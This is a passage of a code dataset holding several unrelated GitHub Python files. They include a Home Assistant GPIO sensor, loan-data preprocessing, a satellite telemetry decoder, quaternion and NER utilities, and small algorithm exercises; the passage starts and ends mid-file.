devices.\"\"\"\n pins = config.get(CONF_PINS)\n\n binary_sensors = []\n\n for pin, params in pins.items():\n binary_sensors.append(BBBGPIOBinarySensor(pin, params))\n add_devices(binary_sensors)\n\n\nclass BBBGPIOBinarySensor(BinarySensorDevice):\n \"\"\"Representation of a binary sensor that uses Beaglebone Black GPIO.\"\"\"\n\n def __init__(self, pin, params):\n \"\"\"Initialize the Beaglebone Black binary sensor.\"\"\"\n self._pin = pin\n self._name = params.get(CONF_NAME) or DEVICE_DEFAULT_NAME\n self._bouncetime = params.get(CONF_BOUNCETIME)\n self._pull_mode = params.get(CONF_PULL_MODE)\n self._invert_logic = params.get(CONF_INVERT_LOGIC)\n\n bbb_gpio.setup_input(self._pin, self._pull_mode)\n self._state = bbb_gpio.read_input(self._pin)\n\n def read_gpio(pin):\n \"\"\"Read state from GPIO.\"\"\"\n self._state = bbb_gpio.read_input(self._pin)\n self.schedule_update_ha_state()\n\n bbb_gpio.edge_detect(self._pin, read_gpio, self._bouncetime)\n\n @property\n def should_poll(self):\n \"\"\"No polling needed.\"\"\"\n return False\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return self._name\n\n @property\n def is_on(self):\n \"\"\"Return the state of the entity.\"\"\"\n return self._state != self._invert_logic\n","repo_name":"jest-community/jest-pytest","sub_path":"src/__tests__/integration/home-assistant/homeassistant/components/binary_sensor/bbb_gpio.py","file_name":"bbb_gpio.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"75"} +{"seq_id":"26199108995","text":"\"\"\"\nModule which stores data parsing/preprocessing functions\n\nThis module implements the following functionality:\n 1. parse_data\n 2. clean_nans\n 3. handle_booleans\n 4. datatype_casting\n 5. credit_score_filtering\n 6. parse_preprocess_data\n\nAuthor: Jared Andrews\nDate: 6/9/23\n\"\"\"\n\nimport logging\nimport warnings\nimport os\nimport pandas as pd\nfrom src.config import date_cols, input_cols, intermediate_data_fp, target_feature, data_fp\nfrom src.utils import clean_folder\n\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\n\n\ndef parse_data(fp, logger):\n \"\"\"\n Parsing in of data used in model training\n\n :param fp: File path to read raw data from\n :param logger: Logger\n :return: parsed raw data\n \"\"\"\n\n assert os.path.exists(fp), \"Specified file path does not exist\"\n\n clean_folder(data_fp)\n\n try:\n # Read in application data (descriptors of a loan)\n app_data = pd.read_excel(fp, engine='openpyxl', sheet_name='Application Data',\n parse_dates=date_cols)\n\n # Read in loan performance data (binary indicator of loan quality)\n loan_performance = pd.read_excel(fp, engine='openpyxl', sheet_name='Loan Performance')\n\n except ValueError as err:\n logging.critical(err, exc_info=True)\n raise err\n\n loan_performance['customer_id'] = loan_performance['idLoan'].str.split('-').str[0].str.lower()\n # Merge app data and loan performance data; note merge occurs on customer_id and not on loanid; 3 customers had\n # good and bad loan performances and so impossible to determine if app data is for good bad loan\n data = app_data.merge(loan_performance, on=['customer_id'])\n # Drop unnecessary customer_id and idLoan features (unique identifiers)\n data.drop(['customer_id', 'idLoan'], axis=1, inplace=True)\n # Determine if missing columns exist in input data\n missing_cols = list(set(input_cols) - set(data.columns))\n assert len(missing_cols) == 0, f\"Input data is missing following features: {str(missing_cols)}\"\n\n logger.info(f\"Raw data successfully read with dimension: {data.shape}\")\n return data\n\n\ndef clean_nans(data, logger):\n \"\"\"\n Handling of nans in input data\n\n :param data: Input data (raw)\n :param logger: Logger\n :return: dataframe with nans removed\n \"\"\"\n\n # Determine which columns contains nans so that these columns can be dealt with on an individual basis\n na_vals = data.isna()\n na_cols = data.columns[data.isna().any()]\n # Utilize dataframe to create logging info on columns and their nan counts (if nans exist)\n nan_df = pd.DataFrame(zip(na_vals[na_cols].sum(), na_vals[na_cols].mean()),\n columns=['nan_count', 'proportion_nan'], index=na_cols).sort_values('nan_count')\n\n logger.info(\"NaNs present in raw data:\")\n for (c, count, prop) in list(zip(nan_df.index, nan_df['nan_count'], nan_df['proportion_nan'])):\n logger.info(f\"\\tCol: {c}, Count: {count}, Proportion: {prop}\")\n\n # bank_account_duration: nan because payment_ach = 0 (additional context required on payment_ach and\n # bank_account_duration fields), since only 1 row will drop\n data = data[data['bank_account_duration'].notnull()]\n\n # how_use_money: dropping nan for bank_account_duration dropped 1 out of 2 how_use_money nan rows; since only 1\n # row will drop\n data = data[data['how_use_money'].notnull()]\n\n # payment_amount_approved: this is a feature that occurs after approval and will not exist in data in production,\n # drop feature as a result\n # other_phone_type: not an important feature, will drop feature\n data.drop(['payment_amount_approved', 'other_phone_type'], axis=1, inplace=True)\n\n logger.info(\"Successfully handled NaN values\")\n return data\n\n\ndef handle_booleans(data, logger):\n \"\"\"\n Handling of booleans in input data\n\n :param data: Input data (nans handled)\n :param logger: Logger\n :return: dataframe with booleans handled\n \"\"\"\n\n # Convert bool to 0/1 feature for model\n bool_cols = data.select_dtypes('bool').columns\n logger.info(f\"Bool Features:\\n\\t{', '.join(list(bool_cols) + [target_feature])}\")\n data[bool_cols] = data[bool_cols].astype(int)\n # Convert target variable (flgGood) to 0/1 feature for model\n data[target_feature] = data[target_feature].map({'Good': 1, 'Bad': 0})\n return data\n\n\ndef datatype_casting(data, logger):\n \"\"\"\n Handling of proper data types in input data\n\n :param data: Input data (nans & booleans handled)\n :param logger: Logger\n :return: dataframe with proper datatypes handled\n \"\"\"\n\n # Zip code, bank routing number are numeric representations of categorical features\n logger.info(f\"Converting {', '.join(['address_zip', 'bank_routing_number'])} to strings\")\n data['address_zip'] = data['address_zip'].astype(str)\n data['bank_routing_number'] = data['bank_routing_number'].astype(str)\n return data\n\n\ndef credit_score_filtering(data, logger):\n \"\"\"\n Handling of proper data types in input data\n\n :param data: Input data (nans & booleans handled, datatypes cast)\n :param logger: Logger\n :return: dataframe with incorrect FICO/L2C scores removed\n \"\"\"\n # Scores should be in range [300, 850]; filter out any rows where FICO/L2C scores are outside of this range\n data_len = len(data)\n data = data[(data[[c for c in data.columns if 'FICO' in c]] > 300).all(axis=1) &\n (data[[c for c in data.columns if 'FICO' in c]] < 850).all(axis=1) &\n (data['raw_l2c_score'] > 300) & (data['raw_l2c_score'] < 850)].reset_index(drop=True)\n num_rows_filtered = data_len - len(data)\n logger.info(f\"{num_rows_filtered} rows removed by FICO/L2C filtering\")\n return data\n\n\ndef parse_preprocess_data(args, logger):\n \"\"\"\n Main data parsing/preprocessing function used before EDA is performed\n\n :param args:\n data_fp: contains File path to read raw data from\n :param logger: Logger\n :return: Preprocessed dataframe\n \"\"\"\n print(\"START: Parsing and initial data preprocessing\")\n data = parse_data(args.data_fp, logger)\n data = clean_nans(data, logger)\n data = handle_booleans(data, logger)\n data = datatype_casting(data, logger)\n data = credit_score_filtering(data, logger)\n\n logger.info(f\"Intermediate data successfully processed with dimension: {data.shape}\")\n\n logger.info(f\"Saving intermediate data to file\")\n data.to_csv(intermediate_data_fp, index=False)\n print(\"DONE: Parsing and initial data preprocessing\")\n\n return data\n","repo_name":"jaredandrews97/Sample-Project-BlastPoint","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5329790354","text":"from collections import defaultdict, deque\nclass Node:\n def __init__(self,x):\n self.val=x\n self.left=None\n self.right=None\n\nclass Solution:\n def __init__(self):\n self.graph=defaultdict(list)\n\n def build_graph(self,parent,child):\n if parent and child:\n self.graph[parent.val].append(child.val)\n self.graph[child.val].append(parent.val)\n\n if child.left:\n self.build_graph(child,child.left)\n if child.right:\n self.build_graph(child,child.right)\n\n def Solve(self,A,B,C):\n self.build_graph(None,A)\n q=deque()\n q.append((B,1))\n vis = set([B])\n ans = []\n while q:\n i,j=q.popleft()\n for node in self.graph[i]:\n if node not in vis:\n if j==C:\n ans.append(node)\n q.append((node,j+1))\n vis.add(node)\n return ans if len(q) < C else [B]\n\nroot=Node(1)\nroot.left=Node(2)\nroot.right=Node(3)\nroot.left.left=Node(4)\nroot.left.right=Node(5)\nroot.right.left=Node(6)\nroot.right.right=Node(7)\nroot.left.left.left=Node(8)\n\nA=Solution()\nB=3\nC=0\nprint(A.Solve(root,B,C))\n","repo_name":"srajsonu/InterviewBit-Solution-Python","sub_path":"Trees/BST/node_distace_C_BT.py","file_name":"node_distace_C_BT.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14308736046","text":"import os\nimport sys\n\nfrom cyberbrain import trace\n\n\n@trace\ndef main(file, inputs):\n text = file.read().rstrip()\n had_placeholders = False\n tmpl = \"Give me {} {}: \"\n\n while True:\n brackets = find_brackets(text)\n if not brackets:\n break\n\n start, stop = brackets\n placeholder = text[start : stop + 1]\n pos = placeholder[1:-1]\n article = \"an\" if pos.lower()[0] in \"aeiou\" else \"a\"\n answer = inputs.pop(0) if inputs else input(tmpl.format(article, pos))\n text = text[0:start] + answer + text[stop + 1 :]\n had_placeholders = True\n\n if had_placeholders:\n print(text)\n else:\n sys.exit(f'\"{args.file.name}\" has no placeholders.')\n\n\ndef find_brackets(text):\n \"\"\"Find angle brackets\"\"\"\n\n start = text.index(\"<\") if \"<\" in text else -1\n stop = text.index(\">\") if start >= 0 and \">\" in text[start + 2 :] else -1\n return (start, stop) if start >= 0 and stop >= 0 else None\n\n\nif __name__ == \"__main__\":\n os.chdir(os.path.dirname(__file__))\n main(\n file=open(\"romeo_juliet.txt\", \"rt\"),\n inputs=[\n \"cars\",\n \"Detroit\",\n \"oil\",\n \"pistons\",\n \"stick shift\",\n \"furious\",\n \"accelerate\",\n \"42\",\n \"foot\",\n \"hammer\",\n ],\n )\n","repo_name":"laike9m/Cyberbrain","sub_path":"examples/mad_libs/mad_libs.py","file_name":"mad_libs.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":2453,"dataset":"github-code","pt":"76"} +{"seq_id":"6953845638","text":"# 2013.11.15 11:25:27 EST\n# Embedded file name: scripts/client/AvatarInputHandler/mathUtils.py\nimport BigWorld\nimport Math\nfrom Math import Vector2, Vector3, Matrix\nimport random\nimport math\n\ndef createIdentityMatrix():\n result = Matrix()\n result.setIdentity()\n return result\n\n\ndef createRotationMatrix(rotation):\n result = Matrix()\n result.setRotateYPR(rotation)\n return result\n\n\ndef createTranslationMatrix(translation):\n result = Matrix()\n result.setTranslate(translation)\n return result\n\n\ndef createRTMatrix(rotation, translation):\n result = Matrix()\n result.setRotateYPR(rotation)\n result.translation = translation\n return result\n\n\ndef createSRTMatrix(scale, rotation, translation):\n scaleMatrix = Matrix()\n scaleMatrix.setScale(scale)\n result = Matrix()\n result.setRotateYPR(rotation)\n result.translation = translation\n result.preMultiply(scaleMatrix)\n return result\n\n\ndef clamp(minVal, maxVal, val):\n if minVal > val:\n return minVal\n if maxVal < val:\n return maxVal\n return val\n\n\ndef clampVector3(minVal, maxVal, val):\n return Vector3(clamp(minVal.x, maxVal.x, val.x), clamp(minVal.y, maxVal.y, val.y), clamp(minVal.z, maxVal.z, val.z))\n\n\ndef clampVectorLength(minLength, maxLength, vector):\n length = vector.length\n if not almostZero(length):\n if minLength > length:\n return vector / length * minLength\n if maxLength is not None and maxLength < length:\n return vector / length * maxLength\n return vector * 1.0\n\n\ndef matrixScale(vector, scaleCoeff):\n return Vector3(vector.x * scaleCoeff.x, vector.y * scaleCoeff.y, vector.z * scaleCoeff.z)\n\n\ndef almostZero(val, epsilon = 0.0004):\n return -epsilon < val < epsilon\n\n\nclass RandomVectors:\n\n @staticmethod\n def random2(magnitude = 1.0, randomGenerator = None):\n if randomGenerator is None:\n randomGenerator = random\n u = randomGenerator.random()\n yaw = 2 * math.pi * u\n return Vector2(math.sin(yaw) * magnitude, math.cos(yaw) * magnitude)\n\n @staticmethod\n def random3Flat(magnitude = 1.0, randomGenerator = None):\n randomVec2 = RandomVectors.random2(magnitude, randomGenerator)\n return Vector3(randomVec2.x, 0.0, randomVec2.y)\n\n @staticmethod\n def random3(magnitude = 1.0, randomGenerator = None):\n if randomGenerator is None:\n randomGenerator = random\n u = randomGenerator.random()\n v = randomGenerator.random()\n yaw = 2 * math.pi * u\n pitch = math.acos(2 * v - 1)\n sin = math.sin(pitch)\n return Vector3(math.sin(yaw) * sin * magnitude, math.cos(pitch) * magnitude, math.cos(yaw) * sin * magnitude)\n\n\nclass FIRFilter(object):\n\n def __init__(self, coeffs = None):\n self.coeffs = coeffs\n self.values = [ Vector3(0) for x in xrange(len(self.coeffs)) ]\n self.__id = 0\n self.value = Vector3(0)\n\n def reset(self):\n self.values = [ Vector3(0) for x in xrange(len(self.coeffs)) ]\n self.__id = 0\n\n def add(self, value):\n self.values[self.__id] = value\n self.value = Vector3(0)\n for id, coeff in enumerate(self.coeffs):\n self.value += self.values[self.__id - id] * coeff\n\n self.__id += 1\n if self.__id >= len(self.values):\n self.__id = 0\n return self.value\n\n\nclass SMAFilter(FIRFilter):\n\n def __init__(self, length):\n FIRFilter.__init__(self, [ 1.0 / length for x in xrange(length) ])\n\n\nclass LowPassFilter(object):\n\n def __init__(self, alpha):\n self.value = Vector3(0)\n self.alpha = alpha\n\n def reset(self):\n self.value = Vector3(0)\n\n def add(self, value):\n self.value = value * self.alpha + (1 - self.alpha) * self.value\n return self.value\n\n\nclass RangeFilter(object):\n value = property(lambda self: self.filter.value)\n\n def __init__(self, minThreshold, maxLength, cutOffThreshold, filter):\n self.minThreshold = minThreshold\n self.maxLength = maxLength\n self.cutOffThreshold = cutOffThreshold\n self.filter = filter\n\n def reset(self):\n self.filter.reset()\n\n def add(self, value):\n valueLength = value.length\n valueToAdd = Vector3(value)\n if valueLength < self.minThreshold or valueLength >= self.cutOffThreshold:\n valueToAdd *= 0.0\n if valueLength > self.maxLength:\n valueToAdd *= self.maxLength / valueLength\n return self.filter.add(valueToAdd)\n# okay decompyling res/scripts/client/avatarinputhandler/mathutils.pyc \n# decompiled 1 files: 1 okay, 0 failed, 0 verify failed\n# 2013.11.15 11:25:27 EST\n","repo_name":"Omegaice/WOTDecompiled","sub_path":"res/scripts/client/avatarinputhandler/mathutils.py","file_name":"mathutils.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"40034830801","text":"#!/usr/bin/env python\nfrom datetime import datetime, timedelta\n\nEPOCH_DATE = datetime.strptime('20000101T000000Z', '%Y%m%dT%H%M%SZ')\n\n\ndef decode_payload(payload, observation_datetime, data_id):\n dt = payload[:32]\n datasets = payload[32:]\n\n # calculate initial datetime\n seconds = int(dt[24:] + dt[16:24] + dt[8:16] + dt[:8], 2)\n\n telemetry = []\n\n while datasets:\n dataset = datasets[:57]\n datasets = datasets[57:]\n\n dataset_datetime = EPOCH_DATE + timedelta(seconds=seconds)\n seconds += 60\n satellite_datetime = datetime.strftime(dataset_datetime, '%Y%m%dT%H%M%SZ')\n\n # mode\n status = dataset[0]\n\n # battery voltage\n u = float(int(dataset[1:9], 2))\n bat_v = round((u + 60) / 20, 2)\n\n # battery current\n u = float(int(dataset[9:17], 2))\n bat_c = round((u - 127) / 127, 2)\n\n # 3v3 current\n u = float(int(dataset[17:25], 2))\n v3_c = round(u / 40, 2)\n\n # 5v current\n u = float(int(dataset[25:33], 2))\n v5_c = round(u / 40, 2)\n\n # temperature comms\n u = float(int(dataset[33:41], 2))\n comms_t = round((u - 60) / 4, 2)\n\n # temperature eps\n u = float(int(dataset[41:49], 2))\n eps_t = round((u - 60) / 4, 2)\n\n # temperature battery\n u = float(int(dataset[49:], 2))\n batt_t = round((u - 60) / 4, 2)\n\n data = {\n 'satellite_datetime': satellite_datetime,\n 'observation_datetime': observation_datetime,\n 'data_id': data_id,\n 'demod_data': {\n 'status': status,\n 'bat_v': bat_v,\n 'bat_c': bat_c,\n 'v3_c': v3_c,\n 'v5_c': v5_c,\n 'comms_t': comms_t,\n 'eps_t': eps_t,\n 'batt_t': batt_t\n }\n }\n\n telemetry.append(data)\n return telemetry\n","repo_name":"elkos/satnogs-db","sub_path":"db/base/decoders/qb50.py","file_name":"qb50.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"27579089698","text":"import numpy as np\nimport csv\nimport os.path\n\n# This script caculates one feature: same_journal\n# For a pair of papers this feature is equal one if and only if the two papers werde published in the same journal and\n# is equal zero if and only if the two papers were not published in the same journal.\n\n\n# checks whether papers were published in the same journal for training and testing set\ndef same_journal(info, index_train, index_test):\n\n # check whether papers were published in the same journal for training_set\n if not os.path.isfile(\"./data/same_journal_training.txt\"):\n\n print(\"Same journal is now calculated for the training data.\")\n\n with open(\"./data/same_journal_training.txt\", 'w') as file:\n for i in range(0, len(index_train)):\n file.write(str(int(info[index_train[i][0]][4].lower() == info[index_train[i][1]][4].lower())) + \"\\n\")\n\n # check whether papers were published in the same journal for testing_set\n if not os.path.isfile(\"./data/same_journal_testing.txt\"):\n\n print(\"Same journal is now calculated for the testing data.\")\n\n with open(\"./data/same_journal_testing.txt\", 'w') as file:\n for i in range(0, len(index_test)):\n file.write(str(int(info[index_test[i][0]][4].lower() == info[index_test[i][1]][4].lower())) + \"\\n\")\n\n","repo_name":"fabrizio-indirli/citationsPrediction","sub_path":"scripts/same_journal.py","file_name":"same_journal.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41417496251","text":"import argparse\nimport logging\nfrom qmath import Quaternion\nimport nn # Import your neural network module here\n\nclass QuaternionOperationDemonstrator:\n def __init__(self, q1, q2):\n self.q1 = q1\n self.q2 = q2\n\n def display_basic_operations(self):\n \"\"\"Display basic quaternion operations.\"\"\"\n print(f\"q1: {self.q1}\")\n print(f\"q2: {self.q2}\")\n print(f\"q1 * q2: {self.q1 * self.q2}\")\n print(f\"q1 + q2: {self.q1 + self.q2}\")\n\n def display_angle_axis_representation(self, q):\n \"\"\"Display angle-axis representation of a quaternion.\"\"\"\n angle, axis = q.to_angle_axis()\n print(f\"Angle-axis representation of {q}: Angle = {angle}, Axis = {axis}\")\n\ndef demonstrate_quaternion_operations():\n \"\"\"Demonstrate quaternion operations.\"\"\"\n q1 = Quaternion(1, 2, 3, 4)\n q2 = Quaternion(2, 3, 4, 5)\n\n demo = QuaternionOperationDemonstrator(q1, q2)\n demo.display_basic_operations()\n demo.display_angle_axis_representation(q1)\n # Add more demonstrations as needed.\n\ndef train_rl_model(logging_level):\n \"\"\"Train an RL model using Quaternion Neural Network.\"\"\"\n # Configure logging\n logging.basicConfig(level=logging_level, format=\"%(asctime)s - %(levelname)s - %(message)s\")\n\n try:\n nn.train_dqn()\n except Exception as e:\n logging.error(f\"An error occurred during training: {e}\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Quaternion Operations and RL Training\")\n parser.add_argument(\"--log-level\", choices=[\"INFO\", \"DEBUG\"], default=\"INFO\",\n help=\"Logging level (INFO or DEBUG)\")\n args = parser.parse_args()\n\n # Set the logging level\n log_level = getattr(logging, args.log_level)\n \n print(\"Demonstrating Quaternion Operations:\")\n demonstrate_quaternion_operations()\n \n print(\"\\nTraining RL Model using Quaternion Neural Network:\")\n train_rl_model(log_level)\n","repo_name":"xStFtx/Aggregate","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71479302647","text":"#!/usr/bin/env python3\n\nimport sys\nfrom datetime import datetime\nfrom statistics import mean, median, stdev\n\n# Check for adequate number of args\nif (len(sys.argv)) <= 1:\n print(\"USAGE: python3 read_time_stats.py inputData\")\n sys.exit()\n\n# Populate a dictionary with the sources and their corresponding bias\nsources = open(\"../csv/sources_histogram.csv\",\"r\")\nsources_bias = {}\nfor line in sources:\n current = line.split(',')\n current_source = current[3].rstrip()\n current_bias = float(current[1])\n sources_bias[current_source] = current_bias\n\nvisited_pages = {}\n# Open user data\ndata = open(sys.argv[1],\"r\")\nfor line in data:\n current = line.split(',')\n time_stamp = current[0]\n type = current[1]\n url = current[2].rstrip()\n\n # Check for entering an article\n if type == \"entering_news_tab\":\n if url not in visited_pages:\n visited_pages[url] = (0, datetime.strptime(time_stamp, '%Y/%m/%d %H:%M:%S'))\n else:\n visited_pages[url] = (visited_pages[url][0], datetime.strptime(time_stamp, '%Y/%m/%d %H:%M:%S'))\n\n # Check for leaving an article\n if type == \"closed_news_site\" or type == 'leaving_news_tab':\n if url in visited_pages:\n if visited_pages[url][1] is not None:\n visited_pages[url] = (visited_pages[url][0] + (datetime.strptime(time_stamp, '%Y/%m/%d %H:%M:%S') - visited_pages[url][1]).total_seconds(), None)\n\nmin = float('inf')\nmax = float('-inf')\n\nx = []\n# Get stats from all the pages read\nfor key, value in visited_pages.items():\n time_spent = int(value[0])\n if time_spent < min:\n min = time_spent\n if time_spent > max:\n max = time_spent\n x.append(time_spent)\n\nprint('mean time: {}'.format(mean(x)))\nprint('minimum time: {}'.format(min))\nprint('median time: {}'.format(median(x)))\nprint('maximum time: {}'.format(max))\nprint('stdev time: {}'.format(stdev(x)))\n","repo_name":"yugowatanabe/counterweight","sub_path":"data_analysis_scripts/read_time_stats.py","file_name":"read_time_stats.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10189590080","text":"from selenium import webdriver\nimport visualisation\n\n\ndef test_header(dash_duo):\n dash_duo.start_server(visualisation)\n dash_duo.wait_for_text_to_equal(\".h1\", \"Pink Morsel Sales\", timeout=None)\n assert dash_duo.find_element(\".h1\").text == \"Pink Morsel Sales\"\n\n\ndef test_visualisation(dash_duo):\n dash_duo.start_server(visualisation)\n dash_duo.wait_for_text_to_equal(\"indicator-graphic\", timeout=None)\n assert dash_duo.wait_for_element_by_id(\"indicator-graphic\", timeout=None)\n\n\ndef test_region_picker(dash_duo):\n dash_duo.start_server(visualisation)\n dash_duo.wait_for_text_to_equal(\"region\", timeout=None)\n assert dash_duo.wait_for_element_by_id(\"region\", timeout=None)\n\n\nif __name__ == '__main__':\n driver = webdriver.Chrome()\n driver.get('http://127.0.0.1:8050/')\n","repo_name":"ShenyiHu/quantium-starter-repo","sub_path":"test_visualistaion.py","file_name":"test_visualistaion.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"3351836177","text":"\"\"\"\nUtility functions.\n\"\"\"\nimport io\nimport os\nimport zipfile\nfrom collections import Counter\n\nimport numpy as np\nimport requests\n\ndef load_data_and_labels(filename):\n \"\"\"Loads data and label from a file.\n Args:\n filename (str): path to the file.\n The file format is tab-separated values.\n A blank line is required at the end of a sentence.\n For example:\n ```\n EU\tB-ORG\n rejects\tO\n German\tB-MISC\n call\tO\n to\tO\n boycott\tO\n British\tB-MISC\n lamb\tO\n .\tO\n Peter\tB-PER\n Blackburn\tI-PER\n ...\n ```\n Returns:\n tuple(numpy array, numpy array): data and labels.\n Example:\n >>> filename = 'medical/train.eval'\n >>> data, labels = load_data_and_labels(filename)\n \"\"\"\n sents, labels = [], []\n words, tags = [], []\n with open(filename) as f:\n for line in f:\n line = line.rstrip()\n if line:\n word, tag = line.split(' ')\n words.append(word)\n tags.append(tag)\n else:\n sents.append(words)\n labels.append(tags)\n words, tags = [], []\n\n return sents, labels\n\ndef load_data(filename):\n \"\"\"Loads data from a file.\n Args:\n filename (str): path to the file.\n A blank line is required at the end of a sentence.\n Returns:\n numpy array: data\n Example:\n >>> filename = 'medical/test.eval'\n >>> data = load_data(filename)\n \"\"\"\n sents = []\n words = []\n with open(filename) as f:\n for line in f:\n line = line.rstrip()\n if line:\n word = line\n words.append(word)\n else:\n sents.append(words)\n words = []\n\n return sents\n\ndef save_prediction(filename, words, tags):\n \"\"\"Saves prediction result to a file.\n Args:\n filename (str): path to the file.\n A blank line is required at the end of a sentence.\n Returns:\n numpy array: data\n Example:\n >>> filename = 'medical/test_prediction.eval'\n >>> data = save_prediction(filename)\n \"\"\"\n with open(filename, 'a+') as f:\n for i in range(len(words)):\n f.write(words[i] + ' ' + tags[i] + '\\n')\n f.write('\\n')\n f.close()\n\ndef batch_iter(data, labels, batch_size=1, shuffle=True, preprocessor=None):\n num_batches_per_epoch = int((len(data) - 1) / batch_size) + 1\n\n def data_generator():\n \"\"\"\n Generates a batch iterator for a dataset.\n \"\"\"\n data_size = len(data)\n while True:\n indices = np.arange(data_size)\n # Shuffle the data at each epoch\n if shuffle:\n indices = np.random.permutation(indices)\n\n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n X = [data[i] for i in indices[start_index: end_index]]\n y = [labels[i] for i in indices[start_index: end_index]]\n yield preprocessor.transform(X, y)\n\n return num_batches_per_epoch, data_generator()\n\nclass Vocabulary(object):\n \"\"\"A vocabulary that maps tokens to ints (storing a vocabulary).\n Attributes:\n _token_count: A collections.Counter object holding the frequencies of tokens\n in the data used to build the Vocabulary.\n _token2id: A collections.defaultdict instance mapping token strings to\n numerical identifiers.\n _id2token: A list of token strings indexed by their numerical identifiers.\n \"\"\"\n\n def __init__(self, max_size=None, lower=True, unk_token=True, specials=('',)):\n \"\"\"Create a Vocabulary object.\n Args:\n max_size: The maximum size of the vocabulary, or None for no\n maximum. Default: None.\n lower: boolean. Whether to convert the texts to lowercase.\n unk_token: boolean. Whether to add unknown token.\n specials: The list of special tokens (e.g., padding or eos) that\n will be prepended to the vocabulary. Default: ('',)\n \"\"\"\n self._max_size = max_size\n self._lower = lower\n self._unk = unk_token\n self._token2id = {token: i for i, token in enumerate(specials)}\n self._id2token = list(specials)\n self._token_count = Counter()\n\n def __len__(self):\n return len(self._token2id)\n\n def add_token(self, token):\n \"\"\"Add token to vocabulary.\n Args:\n token (str): token to add.\n \"\"\"\n token = self.process_token(token)\n self._token_count.update([token])\n\n def add_documents(self, docs):\n \"\"\"Update dictionary from a collection of documents. Each document is a list\n of tokens.\n Args:\n docs (list): documents to add.\n \"\"\"\n for sent in docs:\n sent = map(self.process_token, sent)\n self._token_count.update(sent)\n\n def doc2id(self, doc):\n \"\"\"Get the list of token_id given doc.\n Args:\n doc (list): document.\n Returns:\n list: int id of doc.\n \"\"\"\n doc = map(self.process_token, doc)\n return [self.token_to_id(token) for token in doc]\n\n def id2doc(self, ids):\n \"\"\"Get the token list.\n Args:\n ids (list): token ids.\n Returns:\n list: token list.\n \"\"\"\n return [self.id_to_token(idx) for idx in ids]\n\n def build(self):\n \"\"\"\n Build vocabulary.\n \"\"\"\n token_freq = self._token_count.most_common(self._max_size)\n idx = len(self.vocab)\n for token, _ in token_freq:\n self._token2id[token] = idx\n self._id2token.append(token)\n idx += 1\n if self._unk:\n unk = ''\n self._token2id[unk] = idx\n self._id2token.append(unk)\n\n def process_token(self, token):\n \"\"\"Process token before following methods:\n * add_token\n * add_documents\n * doc2id\n * token_to_id\n Args:\n token (str): token to process.\n Returns:\n str: processed token string.\n \"\"\"\n if self._lower:\n token = token.lower()\n\n return token\n\n def token_to_id(self, token):\n \"\"\"Get the token_id of given token.\n Args:\n token (str): token from vocabulary.\n Returns:\n int: int id of token.\n \"\"\"\n token = self.process_token(token)\n return self._token2id.get(token, len(self._token2id) - 1)\n\n def id_to_token(self, idx):\n \"\"\"token-id to token (string).\n Args:\n idx (int): token id.\n Returns:\n str: string of given token id.\n \"\"\"\n return self._id2token[idx]\n\n @property\n def vocab(self):\n \"\"\"Return the vocabulary.\n Returns:\n dict: get the dict object of the vocabulary.\n \"\"\"\n return self._token2id\n\n @property\n def reverse_vocab(self):\n \"\"\"Return the vocabulary as a reversed dict object.\n Returns:\n dict: reversed vocabulary object.\n \"\"\"\n return self._id2token\n\n\ndef filter_embeddings(embeddings, vocab, dim):\n \"\"\"Loads word vectors in numpy array.\n Args:\n embeddings (dict): a dictionary of numpy array.\n vocab (dict): word_index lookup table.\n Returns:\n numpy array: an array of word embeddings.\n \"\"\"\n if not isinstance(embeddings, dict):\n return\n _embeddings = np.zeros([len(vocab), dim])\n for word in vocab:\n if word in embeddings:\n word_idx = vocab[word]\n _embeddings[word_idx] = embeddings[word]\n\n return _embeddings\n\ndef load_glove(file):\n \"\"\"Loads GloVe vectors in numpy array.\n Args:\n file (str): a path to a glove file.\n Return:\n dict: a dict of numpy arrays.\n \"\"\"\n model = {}\n with open(file) as f:\n for line in f:\n line = line.split(' ')\n word = line[0]\n vector = np.array([float(val) for val in line[1:]])\n model[word] = vector\n\n return model","repo_name":"LordLiang/NER","sub_path":"bilstm_crf/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8327,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"4207083950","text":"# Dada uma string codificada, retorne a string decodificada.\n# s = \"2[a]3[bc]\", retornará \"aabcbcbc\".\n# s = \"3[a2[c]]\", retornará \"accaccacc\".\n# s = \"2[abc]3[cd]ef\", retornará \"abcabccdcdcdef\".\n\n# 2[a] 3[bc]\n# arrStrings = [\"2[a]3[bc]\", \"3[a2[c]]\", \"2[abc]3[cd]ef\"]\n\n# for nr_pos_string, ds_str_atual in enumerate(ds_string):\narrStrings = [\n \"2[a]3[bc]\",\n \"2[abc]3[cd]ef\",\n \"3[a2[c]]\"\n]\n\nclass Decodifica:\n def __init__(self):\n self.arrPilha = []\n\n def decodificar(self, ds_texto):\n for ds_char in 